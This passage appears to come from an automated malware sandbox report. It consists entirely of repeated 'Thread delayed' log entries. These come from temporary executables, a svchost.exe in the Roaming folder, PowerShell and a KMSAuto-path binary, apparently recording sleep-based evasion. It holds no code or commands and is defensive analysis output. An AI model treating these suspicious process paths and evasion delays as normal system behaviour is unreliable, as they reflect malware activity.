                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576318
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 576125
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575937
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575781
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 575627
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599359
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 599031
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 598495
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 598168
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597947
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597734
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597281
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 597031
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 595184
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594953
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594775
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 594615
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599672
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599532
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 599101
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598875
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 598026
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597453
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 597125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 596078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 595625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 595110
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 594360
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593922
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 593047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 592766
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 592438
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591313
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 591105
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590575
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 590328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589985
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589413
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 589194
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588911
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588672
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588489
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 588047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 587172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586953
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586557
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586359
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 586177
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585984
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585824
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 585172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584946
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584782
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584531
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 584032
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583794
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583450
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 583188
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582324
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 582125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 581297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580961
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580750
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580578
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 580102
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579910
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579705
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579250
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 579028
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578499
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 578203
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577656
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577344
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 577094
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576563
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 576057
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575797
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575578
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575352
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 575078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574532
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 574047
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573700
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573250
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 573016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572375
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 572125
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571709
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571219
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 571016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570813
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 570297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569227
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 569016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568779
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568618
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568406
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 568208
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567719
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567438
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567226
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 567031
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566857
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566690
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566496
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566305
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 566031
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565625
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 565183
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564891
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564514
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 564078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563844
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563328
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 563123
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562688
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 562195
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561985
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561516
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 561078
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560860
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560656
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 560032
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559632
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559419
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 559235
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558657
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 558016
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557837
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557608
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557391
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 557141
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556907
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556297
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 556094
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555797
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555563
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555364
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 555172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554974
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554789
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 554382
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553953
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553691
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 553199
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552531
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 552282
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551485
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551281
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 551063
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550858
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550703
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550484
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 550172
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549610
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 549141
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548703
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548469
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 548266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547938
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547735
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 547422
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546906
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546594
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 546266
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545969
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 545188
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 544500
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 544198
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 543828
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\ProgramData\KMSAuto\accc.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599719
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 599265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598734
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598453
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598255
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 598000
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597781
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597590
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 597170
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596906
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596765
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596219
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 596062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595875
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595656
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595490
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595265
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 595047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594633
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594437
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 594250
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593875
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593594
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593359
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 593047
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592562
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 592140
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591797
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591344
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 591062
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590828
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590640
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590406
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 590140
                      Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exeThread delayed: delay time: 589922
